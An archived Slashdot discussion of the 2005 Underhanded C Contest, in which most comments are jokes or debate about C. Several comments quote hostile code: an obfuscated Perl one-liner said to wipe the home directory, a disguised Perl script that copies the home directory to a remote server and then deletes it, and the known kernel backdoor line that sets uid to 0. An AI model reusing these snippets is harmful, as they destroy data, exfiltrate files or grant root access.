Forgot your password?
typodupeerror
Programming Security Technology

The First Annual Underhanded C Contest 341

Posted by CowboyNeal
from the delightfully-malicious dept.
Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."
This discussion has been archived. No new comments can be posted.

The First Annual Underhanded C Contest

Comments Filter:
  • by conner_bw (120497) on Saturday June 11, 2005 @12:04PM (#12789116) Homepage Journal
    ...and a punch in the face?

    "Sending bestiality porn to my mom and boss with my face cut and pasted from my iPhoto library, ho ho! didn't see that one coming... FIRST PRIZE!"

    • how's this? (Score:5, Funny)

      by spongman (182339) on Saturday June 11, 2005 @01:57PM (#12789705)
      int main () { WinExec ("iexplore.exe"); }
  • by The Original Yama (454111) <lists.sridhar@dh ... minus herbivore> on Saturday June 11, 2005 @12:04PM (#12789120) Homepage
    People will do anything for beer! Who needs speech when you're gulping down a cold lager?
  • If they can do something really malicious with innocent-looking C code, they might want to gain a bit more than beer in the course of revealing how they did it...
    • This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?
      perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'
      Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight, then it is far more dangerous. :)

      I mean I could do something like this:

      # When do you want it done?
      $today="sudo";
      $yesterday="su -c";

      # Define our globals
      $superman="ls";
      $wonderwoman="rm"
      $batm an="cp";
      $aquaman="mv";

      #define some important flags
      $blows="-r";
      $maims="-p";
      $chunks="-f";
      $defeats="-s";

      #define some targets
      $your_mom="/";
      $your_dad="/usr";
      $your_ sister="~";
      $your_teacher="/bin";
      $hell="/dev/nu ll";
      $heaven="/dev/random";
      $skyhigh="nfs://myse rver/myhome";

      #....later, back at Superfriends Headquarters

      `$batman $blows $your_sister $skyhigh`;
      `$wonderwoman $blows $chunks $on $your_sister`;
      `$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
      #Would you like to see the rest of the story?
      #print "Would you like to hear more? Please type your password to continue!";

      The superfriends save the day again.
      • I ran it from a test account I created to contain the damage.

        It tried to remove the home directory itself!

        Couldn't do it and it gave up without damaging any files.

        Only severely misconfigured UNIX systems allow deleting one's own home directory, because the directory above your home, which is what you need permission on, you don't have write (you don't have /home writable, right)?

        Nice as a proof of concept, but won't work anymore.
    • Might want to reveal it from the safety of another country, preferably one that doesn't allow extradition to the US...
  • by beta-guy (715984) on Saturday June 11, 2005 @12:05PM (#12789123)
    kill the brain cells that made innocent looking malicous code :P
    • by grammar fascist (239789) on Saturday June 11, 2005 @02:29PM (#12789869) Homepage
      On a more serious note - they should rethink their prize. Not everyone drinks beer, and there are plenty of talented programmers who avoid it completely. In fact, the ones who do probably have more working brain cells to throw at the problem.

      Yes, I know that must come as a shock, and most people here probably won't believe me...yet it's true.

      (And just to head off the inevitable nutcase looking for a Score:5, Funny: no, replacing the prize with free pr0n isn't going to cut it. :p)
      • Ah, but any other self respecting, non beer drinking programmer will recognize its value as currency among lesser mortals. Even simply passing the prize along to lesser mortals can induce acts of goodwill.
  • ...testing the limits of the first ammendment. And all for a beer!

    Seriously, though, this is (obviously) a lot like the obfuscated c contest, but it's a cool idea, in that there's an important lesson to learn about evaluating code.

  • by tehshen (794722)
    I'm interested to know how the beer will be transported. In an airtight container smuggled through check-in? Frozen (planes get pretty cold you know)? Or will they just send money for us to buy beer with?
  • Beer? Phui! (Score:2, Funny)

    by devross (524605)
    The object is to hide evil functionality that survives visual inspection of the source.

    The prize is world domination!
  • It's a bad idea (Score:3, Interesting)

    by Anonymous Coward on Saturday June 11, 2005 @12:13PM (#12789169)
    Count on the likes of Sun, Microsoft, and anyone else selling a non-C language to pounce on this as a marketing opportunity.

    C is a superb language. Why besmirch its reputation with a contest to make it seem as untrustworthy as possible?
    • Re:It's a bad idea (Score:5, Insightful)

      by Catamaran (106796) on Saturday June 11, 2005 @12:39PM (#12789294)
      C gives you just enough rope to hang yourself.

      Java gives you a polished floor on which you can slip and break your neck.

      C++ gives you a thermo-nuclear device.

    • It's unlikely that any techniques that really pass inspection will be C-specific. "Obfuscated coding contest tricks" won't help, because the code has to look benign, and weird comments and variable names and odd spacing won't help.
    • by Urusai (865560)
      You're just used to it. Problems: difficult to compile, difficult to convert to better languages (thank you preprocessor), encourages obfuscation, some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings. That's just off the top of my head.
      • by Tyler Durden (136036) on Saturday June 11, 2005 @03:49PM (#12790291)
        Problems: difficult to compile

        A picky compiler is a blessing, not a curse. It's much easier to identify and fix compile errors than run-time errors.

        difficult to convert to better languages (thank you preprocessor)

        Meaningless troll.

        encourages obfuscation

        Unless the compiler is literally holding a gun to your head, this is meaningless. In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

        some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings.

        Tacked on? If you don't like the way constructs are set up then fine, that's your opinion. But if you read The C Programming Language you can tell that every single construct was scrutinized over for the proper balance of efficiency (why it makes sense to pass array parameters as pointers and structs as copies) and consistency (why data types are declared the way they are. Declaration and use of data is made to match.) Do you honestly believe the creators/first users of C, some of the greatest programmers who ever lived, really said, "Ahhh, fuck it. Let's just throw something together," when designing their own programming tools?

        Most people who don't like C are really just saying they don't like low-level programming because that's what it was designed for, and that's what it's perfect for. Too many newbie programmers get used to some modern, flash-in-the-pan, all-things-to-all-people languages and when they are faced with the challenges of low-level languages rashly conclude that it's the language's fault they're having problems.

        C is the perfect language for the job it was designed for. The same cannot be said for most more modern languages.

      • by jejones (115979) on Saturday June 11, 2005 @04:46PM (#12790613) Journal
        Well...

        C is good for what it was first used for: writing Unix. At least initially, it was mimimalistic; orthogonality took a back seat to ease of implementation. (See Gabriel's classic essay [jwz.org] for details.)

        (It's certainly not flawless. Any language that needs a utility like cdecl to make declarations understandable has problems, and there should've been a Boolean type from the beginning. It would be nice if char (which should be whatever represents a glyph on the target system) weren't conflated with short short int. Basically, if C were in your back yard, it would be declared an "attractive nuisance.")

        I think the authors of The Art of Unix Programming wisely recognize that C, like any other tool, should be used only where appropriate. (Sorry if that's tautological, but I can't think of a better way to put it.)
  • doesn't that make basically all c code underhanded?
  • If the contestants can really hide malicious code, then will the judges get code that does something innocent, something concealed to win the prize, and something else to mess up the judge's files a bit?
    • I'm sure they'll run these directly on their home machine with all their important documents :)
    • The judges will obviously be expecting programs that try to delete files or modify them, so they will without a doubt create a separate environment to run the malicious programs in. Probably they will restore the machine to a known clean state after every run.

      If they didn't do this, you can bet that someone would try to write a program which would detect competitors' programs running and disable them.
  • by numbware (691928) <justin@justinjacobs.com> on Saturday June 11, 2005 @12:15PM (#12789179) Homepage
    #include
    main()
    {
    printf("Hello World");
    }

    Seemingly harmless, right? Wrong. It's still in devlopment, but think about it. You should have to greet the world before you destroy it. :)
  • Covert fingerprinting. In other words, hiding information inside an image file. hmm... Any open-source steganography programs to use as a starting point?
  • although probblably modded funny, the code below will most often just work ! { printf ("hi, this is your bank. really. Look at the logo at the top. Trust me. I'm your bank. Now enter your VISA number and any personal information you can come up with. Maybe you'll win a pony"); scanf("%s", &visanumberbuffer); // duh... buffer overrun anyone :-) }
  • This sounds like someone is asking for an DRM/watermarking-type of application, that would survive open source inspection. Hmmm.
  • like this? (Score:5, Funny)

    by LiquidCoooled (634315) on Saturday June 11, 2005 @12:22PM (#12789215) Homepage Journal
    #include stuff.h
    void main()
    {
    /* nothing / */ /* to see / * here */
    /* whats * / challenging / * about */
    /* this */ /* there / is no */ evil /*
    screensaver(); * function */ /* here
    anyone that thinks there is * / needs */
    /* their / * / eyes testing */ ();
    }

    585
    • by Dun Malg (230075) on Saturday June 11, 2005 @01:46PM (#12789646) Homepage
      Nice idea, but it doesn't look innoucuous. It looks like a trick. I think the contest is for code the equivalent of a razor blade in a nice looking apple, rather than a razor blade hidden in a pile of clearly marked rat poison.
  • Attack the Compiler (Score:5, Interesting)

    by LionKimbro (200000) on Saturday June 11, 2005 @12:28PM (#12789247) Homepage
    Why attack the source code when you can instead attack the compiler? [acm.org]

    You need only attack the compiler, or the linker, or the interpreter.
    • But would such an attack survive a 3rd party human audit of the source code?
    • For all you could possibly want to know about C, and more, check out this book [coding-guidelines.com] (8M pdf). Those who want pure, uncommentaried, standard words can find them here [coding-guidelines.com].
  • Here you go (Score:5, Funny)

    by titzandkunt (623280) * on Saturday June 11, 2005 @12:28PM (#12789249)

    Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

    #define void int

    Hours & hours of irritation & confusion!

    T&K.
  • Diebold (Score:2, Insightful)

    by jay95 (139426)
    I nominate Diebold!
    Now if only we can get them to enter their code in the contest...
    • Re:Diebold (Score:3, Funny)

      by ceejayoz (567949)
      Pfft.

      It's supposed to survive inspection, remember. giveElectionToTheRepublican() is underhanded, but it probably won't survive inspection. ;-)
  • Why? (Score:4, Insightful)

    by simulacrum25 (664049) on Saturday June 11, 2005 @12:37PM (#12789290)
    Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors.

    Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.
    • Re:Why? (Score:5, Insightful)

      by Nf1nk (443791) <nf1nk.yahoo@com> on Saturday June 11, 2005 @01:04PM (#12789425) Homepage
      To find subtley malicous code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
      It is sort of like the computer version of a bomb squad.
      • Re:Why? (Score:3, Informative)

        Remember the recent Linux contamination

        Something like:

        if (blah || blah || uid=0) {
        blah;
        } ...

      • To find subtley malicous code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.

        OR

        Having contests like these creates a sample base of dangerous code and clever tricks that evil doers can use to craft subtley malicous code in open source projects.
    • simulacrum25 said,

      Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

      Dicionary.com describes simulacrum [reference.com] as,

      1. An image; a representation.
      2. An insubstantial, superficial, or vague likeness or semblance.

      So, Mr Simulacrum25 (if that is indeed your real name!), care to tell us why you're so scared of other people looking in to ways of secretly concealing informatio

    • Re:Why? (Score:4, Informative)

      by Xcott Craver (615642) on Saturday June 11, 2005 @01:48PM (#12789658)
      Who is behind this and what is their motivations?

      Is Google down? Okay, I updated the faq to tell you who we are.

      Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerly hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.

      Xcott

  • by stinky wizzleteats (552063) on Saturday June 11, 2005 @12:49PM (#12789338) Homepage Journal
    title Windows
    root (hd0,0)
    chainloader +1

    Now where's my beer?
  • by tvlinux (867035) on Saturday June 11, 2005 @12:50PM (#12789339)
    Help Wanted:
    Diebold needs new programmers. If you have what it takes to hide "winning" code in our election machines. Apply to Diebold Careers [diebold.com]
  • Cheating? (Score:3, Funny)

    by Maxwell'sSilverLART (596756) on Saturday June 11, 2005 @12:55PM (#12789374) Homepage
    Am I required to submit original source code, written by me, or can I merely submit the leaked Windows source, and thus be assured of victory?
  • It looks innocent but is about as evil as it gets.
  • Subtlety (Score:5, Funny)

    by Dirtside (91468) on Saturday June 11, 2005 @01:21PM (#12789521) Journal
    The prize is beer.
    ...but the beer is poisoned!
    • But you also get a free frogurt!
    • by Sentry21 (8183) on Saturday June 11, 2005 @03:47PM (#12790281) Journal
      Programmer: 'Take this source code, but beware! It carries a terrible curse!'
      Judge: 'That's bad.'
      Programmer: 'But it's optimized for PowerPC!'
      Judge: 'That's good!'
      Programmer: 'PowerPC is also cursed.'
      Judge: 'That's bad.'
      Programmer: 'But you get your choice of operating systems!'
      Judge: 'That's good!'
      Programmer: 'The operating systems run on Intel.' *pause* 'That's bad.'
      Judge: 'Can I go now?'
    • Re:Subtlety (Score:3, Informative)

      by RPI Geek (640282)
      Actually I'm from upstate NY and have had a chance to try Ommegang beers; of the three that I've tried, all are excellent.

      I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.
  • Once, many moons ago, we wrote an obscurifaction program that removed all documentation and modified all variables and function names to be random combinations of I's, O's, o's, 0's. and 1's (plus is created rather long names of fairly equal length). It also combined lines to make them all very long.

    Especially useful on large programs it pretty much made the source totally unreadable, and a complete headache to try to unravel even if you countered with a similar program - because all meaning in the origin
  • by exp(pi*sqrt(163)) (613870) on Saturday June 11, 2005 @01:40PM (#12789614) Journal
    There was a bug in the Watcom compiler for DOS many years ago. As a bug report I sent them a piece of code something like:
    char *s = "Fortune coookie";
    int *p = (char *)s;
    for (i = 0; i<4; ++i) {
    putchar(((char *)p)[i]);
    }
    Looks innocent enough. But actually it actually printed an obscenity. There was a bug in the pointer addition code generated by the compiler so that even though (char *)p was a pointer to type char it still used sizeof(int) to index into the array and so it printed every 4th character. (And that explains why I used three o's.)
  • He'll submit the source code to IE.

  • Every year, we will propose a challenge to coders to solve a simple data processing problem, but with covert malicious behavior. Examples include miscounting votes, shaving money from financial transactions, or leaking information to an eavesdropper. The main goal, however, is to write source code that easily passes visual inspection by other programmers.

    Oh dear, now we're rewarding people for writing actual malicious code that is designed to pass visual inspection from other programmers.

    When these s

  • The prize is beer.

    Well, nothing could go wrong here, since we all know that all C programmers are over 21. And if by any chance the winner wasn't over 21 they would make that clear and refuse their prize.

    The next day the headlines read" " C Programmers Give Minors Beer, Drunken Night of Celebration Kills 6 in Traffic Acciident ". Reactionary congressmen urged on by a powerful lobby from Washington State quickly pass laws to outlaw all C programming outside of Microsoft.

  • by thdexter (239625) <dexter@s u f fusions.net> on Saturday June 11, 2005 @01:54PM (#12789692) Journal
    #include <notavirus.h>
    #include <seriouslyitisnt.h>
    So long as they don't check notavirus.h I think I'm in the clear for visual inspection.
  • easy (Score:2, Interesting)

    by RailGunner (554645)
    The Windows Auto Blue screen... (yes, even XP still blows up on this):

    int main (){
    for (int i = 0; i < 100000; i++)
    printf ("\t\t\b\b\b\b\b");
    }
  • by Johnny Hardcore (812958) on Saturday June 11, 2005 @02:25PM (#12789842)
    This reminds me about the attempt at inserting a backdoor [slashdot.org] in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

    The attempt was trying to insert

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

    inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
  • by Master of Transhuman (597628) on Saturday June 11, 2005 @02:50PM (#12789995) Homepage
    "write clear, readable, innocent-looking C code", right?

    Wow, nobody's going to win this one.
  • Vectors (Score:3, Informative)

    by headkase (533448) on Saturday June 11, 2005 @08:27PM (#12791770)
    Any program that was able to do two things would pass: The ability to load remote information into memory and to begin execution of the loaded information.
    A way to automatically find this would be to use an execution tracer that would alert you when the programs point of execution "left" it's source code or allowed system api's.
  • by real gumby (11516) on Saturday June 11, 2005 @11:23PM (#12792669)
    Clearly most of us should be submitting innocuous code to help camouflage the actual malign entries. That will make it harder for the judges to find badness. If you know that all the entries have some badness, then you'll look really hard. If you don't know which ones do, your checking gets worse.

    This would make the test more like the real world too.

Receiving a million dollars tax free will make you feel better than being flat broke and having a stomach ache. -- Dolph Sharp, "I'm O.K., You're Not So Hot"

Working...